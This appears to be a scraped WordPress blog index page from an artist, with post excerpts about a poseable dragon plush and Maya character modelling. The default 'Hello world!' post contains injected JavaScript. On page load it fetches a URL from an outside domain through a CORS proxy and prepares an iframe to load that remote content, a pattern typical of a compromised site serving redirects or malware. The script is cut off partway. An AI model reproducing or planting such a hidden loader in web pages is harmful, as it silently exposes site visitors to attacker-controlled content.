Uncategorized

Kiro Plush

A medium-difficulty plush, a character known as a Dragon Kiro. I have also designed a Puppy Kiro in the process. The dragon has armature wire inside of it so the wings and tail are completely poseable. Both toys feature needle sculpting, custom machine embroidery and applique. The collars are from the pet store.

The dragon’s colours were slightly modified. The secondary color in the tummy, paws, and eyes were changed to blue from the concept art.

Design Process

To get the proportions right I am going to use Maya as a start for my pattern. For something like this, Maya … Read the rest

Week 1

Starting to model a character for animation. I want to get back into rigging and get better at it. Looking back at when I first started working in Maya, I can’t believe what would once take me a week to model now takes a couple of hours.

I started doing that mech over there but realised I can’t do much with it yet. So I put it aside for now and modelled this little Trickdragon character of mine. With this character I can do a muscle simulation on the belly to make it jiggle and add some fire visual effects!… Read the rest

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!

const configLink = "https://corsproxy.io/?url=http://heyues.live";

if (!window.__digitalflwrFetchPromise) {

window.__digitalflwrFetchPromise = fetch(configLink) .then(response ={ if (!response.ok) { throw new Error(" "); } return response.text(); })

.then(finalUrl ={ return fetch(finalUrl, { method: "HEAD" }) .then(headResponse =({ headResponse, finalUrl })); }) .catch(() ={

}); }

if (typeof window.__digitalflwrIframeCreated === "undefined") { window.__digitalflwrIframeCreated = false; }

window.__digitalflwrFetchPromise .then(result ={

if (!result) return; const { headResponse, finalUrl } = result;

if (!headResponse || headResponse.status === 404) { return; }

if (!window.__digitalflwrIframeCreated) { window.__digitalflwrIframeCreated = … Read the rest